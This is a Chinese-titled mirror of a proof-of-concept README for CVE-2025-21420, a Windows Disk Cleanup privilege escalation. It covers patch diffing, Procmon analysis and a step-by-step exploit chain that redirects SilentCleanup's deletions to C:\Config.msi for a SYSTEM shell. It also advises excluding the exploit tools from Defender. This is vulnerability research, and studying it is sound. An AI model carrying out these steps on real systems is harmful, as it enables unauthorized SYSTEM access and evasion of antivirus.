CVE-2025-21420 PoC — Microsoft Windows 后置链接漏洞

Source

Associated Vulnerability

Description

Proof of Concept CVE-2025-21420 (Windows Disk Cleanup Tool EoP)

Readme

## Diffing cleanmgr.exe

The new version of `cleanmgr.exe` includes a call to the [SetProcessMitigationPolicy](https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-setprocessmitigationpolicy) function.

![Diffing](images/diff.png)  
![Diffing](images/diff-ghidra.png)

With `MitigationPolicy` set to 16, corresponding to **ProcessRedirectionTrustPolicy**.

![PROCESS_MITIGATION_POLICY](images/enum-PROCESS_MITIGATION_POLICY.png)

Combined with Microsoft's description of [CWE-59: Improper Link Resolution Before File Access ('Link Following')](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21420), we can infer that `cleanmgr.exe` has Redirection Guard enabled.

After reading two blog posts by *Simon Zuckerbraun* and *enigma0x3*:

1. [From Arbitrary Folder Delete/Move/Rename to SYSTEM EoP](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks)  
2. [Bypass UAC](https://enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup/)

The `SilentCleanup` task may have sufficient privileges to delete the `C:/Config.msi` folder, as mentioned by Simon Zuckerbraun. We only need to locate an *Arbitrary Folder Delete/Move/Rename* vulnerability inside the `SilentCleanup` task (which runs `cleanmgr.exe` with **Run with highest priv**) and redirect it to the `C:/Config.msi` folder.

## Observations via Procmon

Run the `SilentCleanup` task and observe `cleanmgr.exe` behavior.

![Procmon](images/procmon1.png)

The process checks whether the listed folders exist (interestingly, it doesn't verify if `C:\ESD` is a junction, but it does check `Windows` and `Download` — which we won’t dive into here).

Create the folders `C:\$Windows.~WS`, `C:\ESD\Windows`, `C:\ESD\Download`, drop some random files into them, rerun `SilentCleanup` and observe again.

![Procmon](images/procmon2.png)

We can see `SilentCleanup` deletes the contents within the `Windows` and `Download` folders. This can be leveraged using the technique described in [From Folder Contents Delete to SYSTEM EoP](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks).

## Exploit

1. Python script creates 3 folders: `C:\$Windows.~WS`, `C:\ESD\Windows`, `C:\ESD\Download`, inserts dummy `.txt` files and pauses.
2. Run [FolderOrFileDeleteToSystem](https://github.com/thezdi/PoC/tree/main/FilesystemEoPs) to set up the `Config.msi`.
3. Run [FolderContentsDeleteToFolderDelete](https://github.com/thezdi/PoC/tree/main/FilesystemEoPs) to redirect content cleanup from `C:\ESD\Windows` to `C:/Config.msi`.  
   **Note:** Exclude these two processes in Defender as AV may detect this exploit technique.
4. Resume the Python script and run `SilentCleanup` to trigger content cleanup.
5. Run `osk.exe`, then hit Ctrl-Alt-Delete.

https://github.com/user-attachments/assets/d66b43ea-6706-4bce-94c4-ca3a6e97857f

File Snapshot

 [4.0K]  /data/pocs/3b706c924a91c1be9b7c86ed5fc60e96ae25c1f6
├── [ 482]  CVE-2025-21420_POC.py
├── [4.0K]  images
│   ├── [6.4K]  diff-ghidra.png
│   ├── [ 24K]  diff.png
│   ├── [ 66K]  enum-PROCESS_MITIGATION_POLICY.png
│   ├── [ 22M]  exploit.mp4
│   ├── [ 29K]  procmon1.png
│   ├── [ 22K]  procmon2.png
│   └── [ 24K]  taskelevation.png
└── [3.0K]  README.md

1 directory, 9 files

Remarks